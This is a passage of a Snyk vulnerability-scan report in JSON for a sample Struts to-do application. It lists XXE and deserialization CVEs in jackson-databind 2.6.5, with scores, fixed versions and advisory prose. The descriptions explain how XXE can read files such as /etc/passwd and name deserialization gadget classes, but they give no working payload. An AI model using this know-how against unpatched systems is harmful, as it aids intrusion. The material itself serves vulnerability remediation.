"functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-09-29T22:30:33Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-11-29T15:58:07.317638Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:52:55.201119Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", - "title": "XML External Entity (XXE) Injection", - "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "credit": [ - "Bartosz Baranowski" - ], - "semver": { - "vulnerable": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.4", - "2.9.10.7", - "2.10.5.1" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.2, - "functions": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", - "className": "DOMSerializer", - "functionName": "" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": 
"com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2589", - "title": "GitHub Issue" - }, - { - "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", - "title": "RedHat Bugzilla Bug" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "cvssV3BaseScore": 5.8, - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.2, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:03:31.367594Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", - "assigner": "SUSE", - "severity": "medium", - "baseScore": 5.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:41.313444Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "NVD", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:46.628614Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:14.249736Z" - } - ], - 
"description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. 
For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", - "epssDetails": { - "percentile": "0.68432", - "probability": "0.00275", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-25649" - ], - "CWE": [ - "CWE-611" - ], - "GHSA": [ - "GHSA-288c-cq4h-88gq" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-04T11:58:40.054903Z", - "functions_new": [ - { - "version": [ - "[2.6.0,2.6.7.4)", - "[2.9.0,2.9.10.7)", - "[2.10.0, 2.10.5.1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", - "functionName": "" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-04T11:54:03Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-04T15:22:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.249736Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": 
[ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:42.491903Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red 
Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. 
However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35490" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:37:26.422837Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:32:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:26.923105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "title": "Deserialization of 
Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.762302Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "description": "## 
Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. 
Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35491" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:40:53.658144Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:40:13Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": 
"com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:57.453912Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "bu5yer" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2999", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-35728", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "assigner": "NVD", - "severity": 
"high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:43.478254Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. 
An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", - "epssDetails": { - "percentile": "0.80006", - "probability": "0.00674", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35728" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-27T14:34:18.527699Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": 
"2020-12-27T14:05:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-27T17:34:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.852735Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": 
"https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.093517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
